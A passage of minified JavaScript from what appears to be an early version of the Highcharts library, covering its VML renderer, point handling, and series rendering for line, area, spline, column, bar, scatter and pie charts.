+function(P,T){if(e.test(P[1])){d=bc(P[1]);f=d.get("rgb");g=d.get("a")}else{f=P[1];g=1}if(T){m=f;v=g}else{i=f;j=g}});a=90-Fa.atan((h[3]-h[1])/(h[2]-h[0]))*180/kc;a=["<",c,' colors="0% ',i,",100% ",m,'" angle="',a,'" opacity="',v,'" o:opacity2="',j,'" type="gradient" focus="100%" />'];hb(this.prepVML(a),null,null,b)}else if(e.test(a)&&b.tagName!=="IMG"){d=bc(a);a=["<",c,' opacity="',d.get("a"),'"/>'];hb(this.prepVML(a),null,null,b);return d.get("rgb")}else{b=b.getElementsByTagName(c);if(b.length)b[0].opacity= +1;return a}},prepVML:function(a){var b=this.isIE8;a=a.join("");if(b){a=a.replace("/>",' xmlns="urn:schemas-microsoft-com:vml" />');a=a.indexOf('style="')===-1?a.replace("/>",' style="display:inline-block;behavior:url(#default#VML);" />'):a.replace('style="','style="display:inline-block;behavior:url(#default#VML);')}else a=a.replace("<","<hcv:");return a},text:function(a,b,c){var d=Xa.chart.style;return this.createElement("span").attr({text:a,x:W(b),y:W(c)}).css({whiteSpace:"nowrap",fontFamily:d.fontFamily, +fontSize:d.fontSize})},path:function(a){return this.createElement("shape").attr({coordsize:"100 100",d:a})},circle:function(a,b,c){return this.symbol("circle").attr({x:a,y:b,r:c})},g:function(a){var b;if(a)b={className:vc+a,"class":vc+a};return this.createElement(Tb).attr(b)},image:function(a,b,c,d,e){var f=this.createElement("img").attr({src:a});arguments.length>1&&f.css({left:b,top:c,width:d,height:e});return f},rect:function(a,b,c,d,e,f){if(Nb(a)){b=a.y;c=a.width;d=a.height;e=a.r;f=a.strokeWidth; +a=a.x}var g=this.symbol("rect");g.r=e;return g.attr(g.crisp(f,a,b,Ia(c,0),Ia(d,0)))},invertChild:function(a,b){var c=b.style;Ja(a,{flip:"x",left:ja(c.width)-10,top:ja(c.height)-10,rotation:-90})},symbols:{arc:function(a,b,c,d){var e=d.start,f=d.end,g=rb(e),h=Cb(e),i=rb(f),j=Cb(f);d=d.innerR;var m=0.07/c,v=d&&0.1/d||0;if(f-e===0)return["x"];else if(2*kc-f+e<m)i=-m;else if(f-e<v)i=rb(e+v);return["wa",a-c,b-c,a+c,b+c,a+c*g,b+c*h,a+c*i,b+c*j,"at",a-d,b-d,a+d,b+d,a+d*i,b+d*j,a+d*g,b+d*h,"x","e"]},circle:function(a, +b,c){return["wa",a-c,b-c,a+c,b+c,a+c,b,a+c,b,"e"]},rect:function(a,b,c,d){if(!K(d))return[];var e=d.width;d=d.height;var f=a+e,g=b+d;c=tb(c,e,d);return[Za,a+c,b,Ka,f-c,b,"wa",f-2*c,b,f,b+2*c,f-c,b,f,b+c,Ka,f,g-c,"wa",f-2*c,g-2*c,f,g,f,g-c,f-c,g,Ka,a+c,g,"wa",a,g-2*c,a+2*c,g,a+c,g,a,g-c,Ka,a,b+c,"wa",a,b,a+2*c,b+2*c,a,b+c,a+c,b,"x","e"]}}});fd=ma}Nd.prototype.callbacks=[];var Oc=function(){};Oc.prototype={init:function(a,b){var c=a.chart.counters,d;this.series=a;this.applyOptions(b);this.pointAttr= +{};if(a.options.colorByPoint){d=a.chart.options.colors;if(!this.options)this.options={};this.color=this.options.color=this.color||d[c.color++];c.wrapColor(d.length)}a.chart.pointCount++;return this},applyOptions:function(a){var b=this.series;this.config=a;if(lc(a)||a===null)this.y=a;else if(Nb(a)&&!lc(a.length)){sa(this,a);this.options=a}else if(Sb(a[0])){this.name=a[0];this.y=a[1]}else if(lc(a[0])){this.x=a[0];this.y=a[1]}if(this.x===Wa)this.x=b.autoIncrement()},destroy:function(){var a=this,b=a.series, +c=b.chart.hoverPoints,d;b.chart.pointCount--;if(c){a.setState();nc(c,a)}a===b.chart.hoverPoint&&a.onMouseOut();pb(a);u(["graphic","tracker","group","dataLabel","connector","shadowGroup"],function(e){a[e]&&a[e].destroy()});a.legendItem&&a.series.chart.legend.destroyItem(a);for(d in a)a[d]=null},getLabelConfig:function(){return{x:this.category,y:this.y,series:this.series,point:this,percentage:this.percentage,total:this.total||this.stackTotal}},select:function(a,b){var c=this,d=c.series.chart;a=A(a, +!c.selected);c.firePointEvent(a?"select":"unselect",{accumulate:b},function(){c.selected=a;c.setState(a&&"select");b||u(d.getSelectedPoints(),function(e){if(e.selected&&e!==c){e.selected=false;e.setState(ib);e.firePointEvent("unselect")}})})},onMouseOver:function(){var a=this.series.chart,b=a.tooltip,c=a.hoverPoint;c&&c!==this&&c.onMouseOut();this.firePointEvent("mouseOver");b&&!b.shared&&b.refresh(this);this.setState(Bb);a.hoverPoint=this},onMouseOut:function(){this.firePointEvent("mouseOut");this.setState(); +this.series.chart.hoverPoint=null},tooltipFormatter:function(a){var b=this.series;return['<span style="color:'+b.color+'">',this.name||b.name,"</span>: ",!a?"<b>x = "+(this.name||this.x)+",</b> ":"","<b>",!a?"y = ":"",this.y,"</b>"].join("")},update:function(a,b,c){var d=this,e=d.series,f=d.graphic,g=e.chart;b=A(b,true);d.firePointEvent("update",{options:a},function(){d.applyOptions(a);if(Nb(a)){e.getAttribs();f&&f.attr(d.pointAttr[e.state])}e.isDirty=true;b&&g.redraw(c)})},remove:function(a,b){var c= +this,d=c.series,e=d.chart,f=d.data;oc(b,e);a=A(a,true);c.firePointEvent("remove",null,function(){nc(f,c);c.destroy();d.isDirty=true;a&&e.redraw()})},firePointEvent:function(a,b,c){var d=this,e=this.series.options;if(e.point.events[a]||d.options&&d.options.events&&d.options.events[a])this.importEvents();if(a==="click"&&e.allowPointSelect)c=function(f){d.select(null,f.ctrlKey||f.metaKey||f.shiftKey)};Pa(this,a,b,c)},importEvents:function(){if(!this.hasImportedEvents){var a=Ca(this.series.options.point, +this.options).events,b;this.events=a;for(b in a)Qa(this,b,a[b]);this.hasImportedEvents=true}},setState:function(a){var b=this.series,c=b.options.states,d=xb[b.type].marker&&b.options.marker,e=d&&!d.enabled,f=(d=d&&d.states[a])&&d.enabled===false,g=b.stateMarkerGraphic,h=b.chart,i=this.pointAttr;a=a||ib;if(!(a===this.state||this.selected&&a!=="select"||c[a]&&c[a].enabled===false||a&&(f||e&&!d.enabled))){if(this.graphic)this.graphic.attr(i[a]);else{if(a){if(!g)b.stateMarkerGraphic=g=h.renderer.circle(0, +0,i[a].r).attr(i[a]).add(b.group);g.translate(this.plotX,this.plotY)}if(g)g[a?"show":"hide"]()}this.state=a}}};var sb=function(){};sb.prototype={isCartesian:true,type:"line",pointClass:Oc,pointAttrToOptions:{stroke:"lineColor","stroke-width":"lineWidth",fill:"fillColor",r:"radius"},init:function(a,b){var c,d;d=a.series.length;this.chart=a;b=this.setOptions(b);sa(this,{index:d,options:b,name:b.name||"Series "+(d+1),state:ib,pointAttr:{},visible:b.visible!==false,selected:b.selected===true});d=b.events; +for(c in d)Qa(this,c,d[c]);if(d&&d.click||b.point&&b.point.events&&b.point.events.click||b.allowPointSelect)a.runTrackerClick=true;this.getColor();this.getSymbol();this.setData(b.data,false)},autoIncrement:function(){var a=this.options,b=this.xIncrement;b=A(b,a.pointStart,0);this.pointInterval=A(this.pointInterval,a.pointInterval,1);this.xIncrement=b+this.pointInterval;return b},cleanData:function(){var a=this.chart,b=this.data,c,d,e=a.smallestInterval,f,g;Hd(b,function(h,i){return h.x-i.x});if(this.options.connectNulls)for(g= +b.length-1;g>=0;g--)b[g].y===null&&b[g-1]&&b[g+1]&&b.splice(g,1);for(g=b.length-1;g>=0;g--)if(b[g-1]){f=b[g].x-b[g-1].x;if(f>0&&(d===Wa||f<d)){d=f;c=g}}if(e===Wa||d<e)a.smallestInterval=d;this.closestPoints=c},getSegments:function(){var a=-1,b=[],c=this.data;u(c,function(d,e){if(d.y===null){e>a+1&&b.push(c.slice(a+1,e));a=e}else e===c.length-1&&b.push(c.slice(a+1,e+1))});this.segments=b},setOptions:function(a){var b=this.chart.options.plotOptions;return Ca(b[this.type],b.series,a)},getColor:function(){var a= +this.chart.options.colors,b=this.chart.counters;this.color=this.options.color||a[b.color++]||"#0000ff";b.wrapColor(a.length)},getSymbol:function(){var a=this.chart.options.symbols,b=this.chart.counters;this.symbol=this.options.marker.symbol||a[b.symbol++];b.wrapSymbol(a.length)},addPoint:function(a,b,c,d){var e=this.data,f=this.graph,g=this.area,h=this.chart;a=(new this.pointClass).init(this,a);oc(d,h);if(f&&c)f.shift=c;if(g){g.shift=c;g.isArea=true}b=A(b,true);e.push(a);c&&e[0].remove(false);this.getAttribs(); +this.isDirty=true;b&&h.redraw()},setData:function(a,b){var c=this,d=c.data,e=c.initialColor,f=c.chart,g=d&&d.length||0;c.xIncrement=null;if(K(e))f.counters.color=e;for(a=tc(zc(a||[]),function(h){return(new c.pointClass).init(c,h)});g--;)d[g].destroy();c.data=a;c.cleanData();c.getSegments();c.getAttribs();c.isDirty=true;f.isDirtyBox=true;A(b,true)&&f.redraw(false)},remove:function(a,b){var c=this,d=c.chart;a=A(a,true);if(!c.isRemoving){c.isRemoving=true;Pa(c,"remove",null,function(){c.destroy();d.isDirtyLegend= +d.isDirtyBox=true;a&&d.redraw(b)})}c.isRemoving=false},translate:function(){for(var a=this.chart,b=this.options.stacking,c=this.xAxis.categories,d=this.yAxis,e=this.data,f=e.length;f--;){var g=e[f],h=g.x,i=g.y,j=g.low,m=d.stacks[(i<0?"-":"")+this.stackKey];g.plotX=this.xAxis.translate(h);if(b&&this.visible&&m&&m[h]){j=m[h];h=j.total;j.cum=j=j.cum-i;i=j+i;if(b==="percent"){j=h?j*100/h:0;i=h?i*100/h:0}g.percentage=h?g.y*100/h:0;g.stackTotal=h}if(K(j))g.yBottom=d.translate(j,0,1,0,1);if(i!==null)g.plotY= +d.translate(i,0,1,0,1);g.clientX=a.inverted?a.plotHeight-g.plotX:g.plotX;g.category=c&&c[g.x]!==Wa?c[g.x]:g.x}},setTooltipPoints:function(a){var b=this.chart,c=b.inverted,d=[],e=W((c?b.plotTop:b.plotLeft)+b.plotSizeX),f,g,h=[];if(a)this.tooltipPoints=null;u(this.segments,function(i){d=d.concat(i)});if(this.xAxis&&this.xAxis.reversed)d=d.reverse();u(d,function(i,j){f=d[j-1]?d[j-1]._high+1:0;for(g=i._high=d[j+1]?lb((i.plotX+(d[j+1]?d[j+1].plotX:e))/2):e;f<=g;)h[c?e-f++:f++]=i});this.tooltipPoints=h}, +onMouseOver:function(){var a=this.chart,b=a.hoverSeries;if(!(!Kb&&a.mouseIsDown)){b&&b!==this&&b.onMouseOut();this.options.events.mouseOver&&Pa(this,"mouseOver");this.tracker&&this.tracker.toFront();this.setState(Bb);a.hoverSeries=this}},onMouseOut:function(){var a=this.options,b=this.chart,c=b.tooltip,d=b.hoverPoint;d&&d.onMouseOut();this&&a.events.mouseOut&&Pa(this,"mouseOut");c&&!a.stickyTracking&&c.hide();this.setState();b.hoverSeries=null},animate:function(a){var b=this.chart,c=this.clipRect, +d=this.options.animation;if(d&&!Nb(d))d={};if(a){if(!c.isAnimating){c.attr("width",0);c.isAnimating=true}}else{c.animate({width:b.plotSizeX},d);this.animate=null}},drawPoints:function(){var a,b=this.data,c=this.chart,d,e,f,g,h,i;if(this.options.marker.enabled)for(f=b.length;f--;){g=b[f];d=g.plotX;e=g.plotY;i=g.graphic;if(e!==Wa&&!isNaN(e)){a=g.pointAttr[g.selected?"select":ib];h=a.r;if(i)i.animate({x:d,y:e,r:h});else g.graphic=c.renderer.symbol(A(g.marker&&g.marker.symbol,this.symbol),d,e,h).attr(a).add(this.group)}}}, +convertAttribs:function(a,b,c,d){var e=this.pointAttrToOptions,f,g,h={};a=a||{};b=b||{};c=c||{};d=d||{};for(f in e){g=e[f];h[f]=A(a[g],b[f],c[f],d[f])}return h},getAttribs:function(){var a=this,b=xb[a.type].marker?a.options.marker:a.options,c=b.states,d=c[Bb],e,f=a.color,g={stroke:f,fill:f},h=a.data,i=[],j,m=a.pointAttrToOptions,v;if(a.options.marker){d.radius=d.radius||b.radius+2;d.lineWidth=d.lineWidth||b.lineWidth+1}else d.color=d.color||bc(d.color||f).brighten(d.brightness).get();i[ib]=a.convertAttribs(b, +g);u([Bb,"select"],function(P){i[P]=a.convertAttribs(c[P],i[ib])});a.pointAttr=i;for(f=h.length;f--;){g=h[f];if((b=g.options&&g.options.marker||g.options)&&b.enabled===false)b.radius=0;e=false;if(g.options)for(v in m)if(K(b[m[v]]))e=true;if(e){j=[];c=b.states||{};e=c[Bb]=c[Bb]||{};if(!a.options.marker)e.color=bc(e.color||g.options.color).brighten(e.brightness||d.brightness).get();j[ib]=a.convertAttribs(b,i[ib]);j[Bb]=a.convertAttribs(c[Bb],i[Bb],j[ib]);j.select=a.convertAttribs(c.select,i.select, +j[ib])}else j=i;g.pointAttr=j}},destroy:function(){var a=this,b=a.chart,c=a.clipRect,d=/\/5[0-9\.]+ (Safari|Mobile)\//.test(yc),e,f;Pa(a,"destroy");pb(a);a.legendItem&&a.chart.legend.destroyItem(a);u(a.data,function(g){g.destroy()});if(c&&c!==b.clipRect)a.clipRect=c.destroy();u(["area","graph","dataLabelsGroup","group","tracker"],function(g){if(a[g]){e=d&&g==="group"?"hide":"destroy";a[g][e]()}});if(b.hoverSeries===a)b.hoverSeries=null;nc(b.series,a);for(f in a)delete a[f]},drawDataLabels:function(){if(this.options.dataLabels.enabled){var a, +b,c=this.data,d=this.options,e=d.dataLabels,f,g=this.dataLabelsGroup,h=this.chart,i=h.renderer,j=h.inverted,m=this.type,v;v=d.stacking;var P=m==="column"||m==="bar",T=e.verticalAlign===null,Y=e.y===null;if(P)if(v){if(T)e=Ca(e,{verticalAlign:"middle"});if(Y)e=Ca(e,{y:{top:14,middle:4,bottom:-6}[e.verticalAlign]})}else if(T)e=Ca(e,{verticalAlign:"top"});if(g)g.translate(h.plotLeft,h.plotTop);else g=this.dataLabelsGroup=i.g("data-labels").attr({visibility:this.visible?Ab:ob,zIndex:6}).translate(h.plotLeft, +h.plotTop).add();v=e.color;if(v==="auto")v=null;e.style.color=A(v,this.color,"black");u(c,function(H){var U=H.barX,z=U&&U+H.barW/2||H.plotX||-999,M=A(H.plotY,-999),y=H.dataLabel,C=e.align,Z=Y?H.y>=0?-6:12:e.y;f=e.formatter.call(H.getLabelConfig());a=(j?h.plotWidth-M:z)+e.x;b=(j?h.plotHeight-z:M)+Z;if(m==="column")a+={left:-1,right:1}[C]*H.barW/2||0;if(j&&H.y<0){C="right";a-=10}if(y){if(j&&!e.y)b=b+ja(y.styles.lineHeight)*0.9-y.getBBox().height/2;y.attr({text:f}).animate({x:a,y:b})}else if(K(f)){y= +H.dataLabel=i.text(f,a,b).attr({align:C,rotation:e.rotation,zIndex:1}).css(e.style).add(g);j&&!e.y&&y.attr({y:b+ja(y.styles.lineHeight)*0.9-y.getBBox().height/2})}if(P&&d.stacking&&y){z=H.barY;M=H.barW;H=H.barH;y.align(e,null,{x:j?h.plotWidth-z-H:U,y:j?h.plotHeight-U-M:z,width:j?H:M,height:j?M:H})}})}},drawGraph:function(){var a=this,b=a.options,c=a.graph,d=[],e,f=a.area,g=a.group,h=b.lineColor||a.color,i=b.lineWidth,j=b.dashStyle,m,v=a.chart.renderer,P=a.yAxis.getThreshold(b.threshold||0),T=/^area/.test(a.type), +Y=[],H=[];u(a.segments,function(U){m=[];u(U,function(C,Z){if(a.getPointSpline)m.push.apply(m,a.getPointSpline(U,C,Z));else{m.push(Z?Ka:Za);Z&&b.step&&m.push(C.plotX,U[Z-1].plotY);m.push(C.plotX,C.plotY)}});if(U.length>1)d=d.concat(m);else Y.push(U[0]);if(T){var z=[],M,y=m.length;for(M=0;M<y;M++)z.push(m[M]);y===3&&z.push(Ka,m[1],m[2]);if(b.stacking&&a.type!=="areaspline")for(M=U.length-1;M>=0;M--)z.push(U[M].plotX,U[M].yBottom);else z.push(Ka,U[U.length-1].plotX,P,Ka,U[0].plotX,P);H=H.concat(z)}}); +a.graphPath=d;a.singlePoints=Y;if(T){e=A(b.fillColor,bc(a.color).setOpacity(b.fillOpacity||0.75).get());if(f)f.animate({d:H});else a.area=a.chart.renderer.path(H).attr({fill:e}).add(g)}if(c){Hc(c);c.animate({d:d})}else if(i){c={stroke:h,"stroke-width":i};if(j)c.dashstyle=j;a.graph=v.path(d).attr(c).add(g).shadow(b.shadow)}},render:function(){var a=this,b=a.chart,c,d,e=a.options,f=e.animation,g=f&&a.animate;f=g?f&&f.duration||500:0;var h=a.clipRect,i=b.renderer;if(!h){h=a.clipRect=!b.hasRendered&& +b.clipRect?b.clipRect:i.clipRect(0,0,b.plotSizeX,b.plotSizeY);if(!b.clipRect)b.clipRect=h}if(!a.group){c=a.group=i.g("series");if(b.inverted){d=function(){c.attr({width:b.plotWidth,height:b.plotHeight}).invert()};d();Qa(b,"resize",d);Qa(a,"destroy",function(){pb(b,"resize",d)})}c.clip(a.clipRect).attr({visibility:a.visible?Ab:ob,zIndex:e.zIndex}).translate(b.plotLeft,b.plotTop).add(b.seriesGroup)}a.drawDataLabels();g&&a.animate(true);a.drawGraph&&a.drawGraph();a.drawPoints();a.options.enableMouseTracking!== +false&&a.drawTracker();g&&a.animate();setTimeout(function(){h.isAnimating=false;if((c=a.group)&&h!==b.clipRect&&h.renderer){c.clip(a.clipRect=b.clipRect);h.destroy()}},f);a.isDirty=false},redraw:function(){var a=this.chart,b=this.group;if(b){a.inverted&&b.attr({width:a.plotWidth,height:a.plotHeight});b.animate({translateX:a.plotLeft,translateY:a.plotTop})}this.translate();this.setTooltipPoints(true);this.render()},setState:function(a){var b=this.options,c=this.graph,d=b.states;b=b.lineWidth;a=a|| +ib;if(this.state!==a){this.state=a;if(!(d[a]&&d[a].enabled===false)){if(a)b=d[a].lineWidth||b+1;if(c&&!c.dashstyle)c.attr({"stroke-width":b},a?0:500)}}},setVisible:function(a,b){var c=this.chart,d=this.legendItem,e=this.group,f=this.tracker,g=this.dataLabelsGroup,h,i=this.data,j=c.options.chart.ignoreHiddenSeries;h=this.visible;h=(this.visible=a=a===Wa?!h:a)?"show":"hide";e&&e[h]();if(f)f[h]();else for(e=i.length;e--;){f=i[e];f.tracker&&f.tracker[h]()}g&&g[h]();d&&c.legend.colorizeItem(this,a);this.isDirty= +true;this.options.stacking&&u(c.series,function(m){if(m.options.stacking&&m.visible)m.isDirty=true});if(j)c.isDirtyBox=true;b!==false&&c.redraw();Pa(this,h)},show:function(){this.setVisible(true)},hide:function(){this.setVisible(false)},select:function(a){this.selected=a=a===Wa?!this.selected:a;if(this.checkbox)this.checkbox.checked=a;Pa(this,a?"select":"unselect")},drawTracker:function(){var a=this,b=a.options,c=[].concat(a.graphPath),d=c.length,e=a.chart,f=e.options.tooltip.snap,g=a.tracker,h=b.cursor; +h=h&&{cursor:h};var i=a.singlePoints,j;if(d)for(j=d+1;j--;){c[j]===Za&&c.splice(j+1,0,c[j+1]-f,c[j+2],Ka);if(j&&c[j]===Za||j===d)c.splice(j,0,Ka,c[j-2]+f,c[j-1])}for(j=0;j<i.length;j++){d=i[j];c.push(Za,d.plotX-f,d.plotY,Ka,d.plotX+f,d.plotY)}if(g)g.attr({d:c});else a.tracker=e.renderer.path(c).attr({isTracker:true,stroke:ce,fill:jb,"stroke-width":b.lineWidth+2*f,visibility:a.visible?Ab:ob,zIndex:b.zIndex||1}).on(Kb?"touchstart":"mouseover",function(){e.hoverSeries!==a&&a.onMouseOver()}).on("mouseout", +function(){b.stickyTracking||a.onMouseOut()}).css(h).add(e.trackerGroup)}};ma=yb(sb);wb.line=ma;ma=yb(sb,{type:"area"});wb.area=ma;ma=yb(sb,{type:"spline",getPointSpline:function(a,b,c){var d=b.plotX,e=b.plotY,f=a[c-1],g=a[c+1],h,i,j,m;if(c&&c<a.length-1){a=f.plotY;j=g.plotX;g=g.plotY;var v;h=(1.5*d+f.plotX)/2.5;i=(1.5*e+a)/2.5;j=(1.5*d+j)/2.5;m=(1.5*e+g)/2.5;v=(m-i)*(j-d)/(j-h)+e-m;i+=v;m+=v;if(i>a&&i>e){i=Ia(a,e);m=2*e-i}else if(i<a&&i<e){i=tb(a,e);m=2*e-i}if(m>g&&m>e){m=Ia(g,e);i=2*e-m}else if(m< +g&&m<e){m=tb(g,e);i=2*e-m}b.rightContX=j;b.rightContY=m}if(c){b=["C",f.rightContX||f.plotX,f.rightContY||f.plotY,h||d,i||e,d,e];f.rightContX=f.rightContY=null}else b=[Za,d,e];return b}});wb.spline=ma;ma=yb(ma,{type:"areaspline"});wb.areaspline=ma;var hd=yb(sb,{type:"column",pointAttrToOptions:{stroke:"borderColor","stroke-width":"borderWidth",fill:"color",r:"borderRadius"},init:function(){sb.prototype.init.apply(this,arguments);var a=this,b=a.chart;b.hasColumn=true;b.hasRendered&&u(b.series,function(c){if(c.type=== +a.type)c.isDirty=true})},translate:function(){var a=this,b=a.chart,c=a.options,d=c.stacking,e=c.borderWidth,f=0,g=a.xAxis.reversed,h=a.xAxis.categories,i={},j,m;sb.prototype.translate.apply(a);u(b.series,function(C){if(C.type===a.type&&C.visible){if(C.options.stacking){j=C.stackKey;if(i[j]===Wa)i[j]=f++;m=i[j]}else m=f++;C.columnIndex=m}});var v=a.data,P=a.closestPoints;h=bb(v[1]?v[P].plotX-v[P-1].plotX:b.plotSizeX/(h&&h.length||1));P=h*c.groupPadding;var T=(h-2*P)/f,Y=c.pointWidth,H=K(Y)?(T-Y)/2: +T*c.pointPadding,U=Ia(A(Y,T-2*H),1),z=H+(P+((g?f-a.columnIndex:a.columnIndex)||0)*T-h/2)*(g?-1:1),M=a.yAxis.getThreshold(c.threshold||0),y=A(c.minPointLength,5);u(v,function(C){var Z=C.plotY,Sa=C.yBottom||M,Na=C.plotX+z,Ea=md(tb(Z,Sa)),gb=md(Ia(Z,Sa)-Ea),Lb=a.yAxis.stacks[(C.y<0?"-":"")+a.stackKey],Rb;d&&a.visible&&Lb&&Lb[C.x]&&Lb[C.x].setOffset(z,U);if(bb(gb)<y){if(y){gb=y;Ea=bb(Ea-M)>y?Sa-y:M-(Z<=M?y:0)}Rb=Ea-3}sa(C,{barX:Na,barY:Ea,barW:U,barH:gb});C.shapeType="rect";Z=sa(b.renderer.Element.prototype.crisp.apply({}, +[e,Na,Ea,U,gb]),{r:c.borderRadius});if(e%2){Z.y-=1;Z.height+=1}C.shapeArgs=Z;C.trackerArgs=K(Rb)&&Ca(C.shapeArgs,{height:Ia(6,gb+3),y:Rb})})},getSymbol:function(){},drawGraph:function(){},drawPoints:function(){var a=this,b=a.options,c=a.chart.renderer,d,e;u(a.data,function(f){var g=f.plotY;if(g!==Wa&&!isNaN(g)&&f.y!==null){d=f.graphic;e=f.shapeArgs;if(d){Hc(d);d.animate(e)}else f.graphic=c[f.shapeType](e).attr(f.pointAttr[f.selected?"select":ib]).add(a.group).shadow(b.shadow)}})},drawTracker:function(){var a= +this,b=a.chart,c=b.renderer,d,e,f=+new Date,g=a.options,h=g.cursor,i=h&&{cursor:h},j;u(a.data,function(m){e=m.tracker;d=m.trackerArgs||m.shapeArgs;delete d.strokeWidth;if(m.y!==null)if(e)e.attr(d);else m.tracker=c[m.shapeType](d).attr({isTracker:f,fill:ce,visibility:a.visible?Ab:ob,zIndex:g.zIndex||1}).on(Kb?"touchstart":"mouseover",function(v){j=v.relatedTarget||v.fromElement;b.hoverSeries!==a&&Ga(j,"isTracker")!==f&&a.onMouseOver();m.onMouseOver()}).on("mouseout",function(v){if(!g.stickyTracking){j= +v.relatedTarget||v.toElement;Ga(j,"isTracker")!==f&&a.onMouseOut()}}).css(i).add(m.group||b.trackerGroup)})},animate:function(a){var b=this,c=b.data;if(!a){u(c,function(d){var e=d.graphic;d=d.shapeArgs;if(e){e.attr({height:0,y:b.yAxis.translate(0,0,1)});e.animate({height:d.height,y:d.y},b.options.animation)}});b.animate=null}},remove:function(){var a=this,b=a.chart;b.hasRendered&&u(b.series,function(c){if(c.type===a.type)c.isDirty=true});sb.prototype.remove.apply(a,arguments)}});wb.column=hd;ma=yb(hd, +{type:"bar",init:function(a){a.inverted=this.inverted=true;hd.prototype.init.apply(this,arguments)}});wb.bar=ma;ma=yb(sb,{type:"scatter",translate:function(){var a=this;sb.prototype.translate.apply(a);u(a.data,function(b){b.shapeType="circle";b.shapeArgs={x:b.plotX,y:b.plotY,r:a.chart.options.tooltip.snap}})},drawTracker:function(){var a=this,b=a.options.cursor,c=b&&{cursor:b},d;u(a.data,function(e){(d=e.graphic)&&d.attr({isTracker:true}).on("mouseover",function(){a.onMouseOver();e.onMouseOver()}).on("mouseout", +function(){a.options.stickyTracking||a.onMouseOut()}).css(c)})},cleanData:function(){}});wb.scatter=ma;ma=yb(Oc,{init:function(){Oc.prototype.init.apply(this,arguments);var a=this,b;sa(a,{visible:a.visible!==false,name:A(a.name,"Slice")});b=function(){a.slice()};Qa(a,"select",b);Qa(a,"unselect",b);return a},setVisible:function(a){var b=this.series.chart,c=this.tracker,d=this.dataLabel,e=this.connector,f=this.shadowGroup,g;g=(this.visible=a=a===Wa?!this.visible:a)?"show":"hide";this.group[g]();c&& +c[g]();d&&d[g]();e&&e[g]();f&&f[g]();this.legendItem&&b.legend.colorizeItem(this,a)},slice:function(a,b,c){var d=this.series.chart,e=this.slicedTranslation;oc(c,d);A(b,true);a=this.sliced=K(a)?a:!this.sliced;a={translateX:a?e[0]:d.plotLeft,translateY:a?e[1]:d.plotTop};this.group.animate(a);this.shadowGroup&&this.shadowGroup.animate(a)}});ma=yb(sb,{type:"pie",isCartesian:false,pointClass:ma,pointAttrToOptions:{stroke:"borderColor","stroke-width":"borderWidth",fill:"color"},getColor:function(){this.initialColor= +this.chart.counters.color},animate:function(){var a=this;u(a.data,function(b){var c=b.graphic;b=b.shapeArgs;var d=-kc/2;if(c){c.attr({r:0,start:d,end:d});c.animate({r:b.r,start:b.start,end:b.end},a.options.animation)}});a.animate=null},translate:function(){var a=0,b=-0.25,c=this.options,d=c.slicedOffset,e=d+c.borderWidth,f=c.center.concat([c.size,c.innerSize||0]),g=this.chart,h=g.plotWidth,i=g.plotHeight,j,m,v,P=this.data,T=2*kc,Y,H=tb(h,i),U,z,M,y=c.dataLabels.distance;f=tc(f,function(C,Z){return(U= +/%$/.test(C))?[h,i,H,H][Z]*ja(C)/100:C});this.getX=function(C,Z){v=Fa.asin((C-f[1])/(f[2]/2+y));return f[0]+(Z?-1:1)*rb(v)*(f[2]/2+y)};this.center=f;u(P,function(C){a+=C.y});u(P,function(C){Y=a?C.y/a:0;j=W(b*T*1E3)/1E3;b+=Y;m=W(b*T*1E3)/1E3;C.shapeType="arc";C.shapeArgs={x:f[0],y:f[1],r:f[2]/2,innerR:f[3]/2,start:j,end:m};v=(m+j)/2;C.slicedTranslation=tc([rb(v)*d+g.plotLeft,Cb(v)*d+g.plotTop],W);z=rb(v)*f[2]/2;M=Cb(v)*f[2]/2;C.tooltipPos=[f[0]+z*0.7,f[1]+M*0.7];C.labelPos=[f[0]+z+rb(v)*y,f[1]+M+Cb(v)* +y,f[0]+z+rb(v)*e,f[1]+M+Cb(v)*e,f[0]+z,f[1]+M,y<0?"center":v<T/4?"left":"right",v];C.percentage=Y*100;C.total=a});this.setTooltipPoints()},render:function(){this.drawPoints();this.options.enableMouseTracking!==false&&this.drawTracker();this.drawDataLabels();this.options.animation&&this.animate&&this.animate();this.isDirty=false},drawPoints:function(){var a=this.chart,b=a.renderer,c,d,e,f=this.options.shadow,g,h;u(this.data,function(i){d=i.graphic;h=i.shapeArgs;e=i.group;g=i.shadowGroup;if(f&&!g)g= +i.shadowGroup=b.g("shadow").attr({zIndex:4}).add();if(!e)e=i.group=b.g("point").attr({zIndex:5}).add();c=i.sliced?i.slicedTranslation:[a.plotLeft,a.plotTop];e.translate(c[0],c[1]);g&&g.translate(c[0],c[1]);if(d)d.animate(h);else i.graphic=b.arc(h).attr(sa(i.pointAttr[ib],{"stroke-linejoin":"round"})).add(i.group).shadow(f,g);i.visible===false&&i.setVisible(false)})},drawDataLabels:function(){var a=this.data,b,c=this.chart,d=this.options.dataLabels,e=A(d.connectorPadding,10),f=A(d.connectorWidth,1), +g,h,i=A(d.softConnector,true),j=d.distance,m=this.center,v=m[2]/2;m=m[1];var P=j>0,T=[[],[]],Y,H,U,z,M=2,y;if(d.enabled){sb.prototype.drawDataLabels.apply(this);u(a,function(gb){if(gb.dataLabel)T[gb.labelPos[7]<kc/2?0:1].push(gb)});T[1].reverse();z=function(gb,Lb){return Lb.y-gb.y};for(a=T[0][0]&&T[0][0].dataLabel&&ja(T[0][0].dataLabel.styles.lineHeight);M--;){var C=[],Z=[],Sa=T[M],Na=Sa.length,Ea;for(y=m-v-j;y<=m+v+j;y+=a)C.push(y);U=C.length;if(Na>U){h=[].concat(Sa);h.sort(z);for(y=Na;y--;)h[y].rank= +y;for(y=Na;y--;)Sa[y].rank>=U&&Sa.splice(y,1);Na=Sa.length}for(y=0;y<Na;y++){b=Sa[y];h=b.labelPos;b=9999;for(H=0;H<U;H++){g=bb(C[H]-h[1]);if(g<b){b=g;Ea=H}}if(Ea<y&&C[y]!==null)Ea=y;else{if(U<Na-y+Ea&&C[y]!==null)Ea=U-Na+y;for(;C[Ea]===null;)Ea++}Z.push({i:Ea,y:C[Ea]});C[Ea]=null}Z.sort(z);for(y=0;y<Na;y++){b=Sa[y];h=b.labelPos;g=b.dataLabel;H=Z.pop();Y=h[1];U=b.visible===false?ob:Ab;Ea=H.i;H=H.y;if(Y>H&&C[Ea+1]!==null||Y<H&&C[Ea-1]!==null)H=Y;Y=this.getX(Ea===0||Ea===C.length-1?Y:H,M);g.attr({visibility:U, 